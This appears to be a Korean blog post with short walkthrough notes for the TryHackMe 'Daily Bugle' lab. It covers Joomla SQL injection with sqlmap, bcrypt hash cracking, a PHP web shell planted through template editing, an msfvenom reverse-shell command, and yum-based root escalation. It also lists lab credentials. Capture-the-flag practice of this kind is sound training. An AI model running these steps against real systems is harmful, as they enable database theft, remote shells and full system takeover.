OSCP/TryHackMe

[Linux] Daily Bugle

우와해커 2020. 4. 25. 23:06

Daily Bugle
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.

문제에 대한 포럼과 다른 방법의 팁들
https://tryhackme.com/thread/5e1ef29a2eda9b0f20b151fd

칼리에 joomla 스캐너 툴이 존재함
=> 버전: joomscan  3.7.0
http://10.10.113.114/administrator

Exploit-DB검색

searchsploit joomla 3.7.0

 

SQLMAP 진행

추출 순서
1. DBMS: --dbs
2. TABLE: -D joomla --tables
3. Columns: -D joomla -T users --columns 

4. Values:  –D joomla –T users –C admin_email,admin_pass --dump

 

root 
iVamos! 

jonah@tryhackme.com 
spiderman123 

 

 

발견된 hash를 대상으로 John the ripper
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm
- bcrypt, Blowfish(OpenBSD)
salt:0veO/JSFh4389Lluc4Xya.
hash:dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

 

 

joomla 관리자 페이지에서 templates 내용 수정하여 php웹쉘 업로드

- 최신 업데이트 방법에 대한 구글링이 필요한 내용

 


리눅스 venom 쉘 코드 제작

Linux Meterpreter Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 

대표 페이로드
linux/x86/meterpreter/reverse_tcp
linux/x86/shell_reverse


Local Enumeration
1. linux-exploit-suggester => GCC설치가 안되어있으므로 불가.
2. LinPEAS.sh 스크립트=> 평문 비밀번호 발견 => /etc/passwd로 확인된 계정으로 ssh연결 시도

 

jjameson
nv5uz9r3ZEDzVjNu


권한상승
1. gcc 설치 유무: linux ex suggester 활용
2. cronjob 체크: crontab -l 등....
3. 바이너리 perm 체크: find / -perm -4000 2>/dev/null
4. sudo 체크: sudo -l
=> yum 확인 => 아래 경로에서 Exploit 확인 => 루트 Spawn
https://gtfobins.github.io/


















'OSCP > TryHackMe' 카테고리의 다른 글

[Linux] MrRobot  (0) 2020.05.13
Hacking with Powershell  (0) 2020.05.06
[Linux] Skynet  (0) 2020.04.23
[Linux] Game Zone  (0) 2020.04.22
[Windows] HackPark  (0) 2020.04.20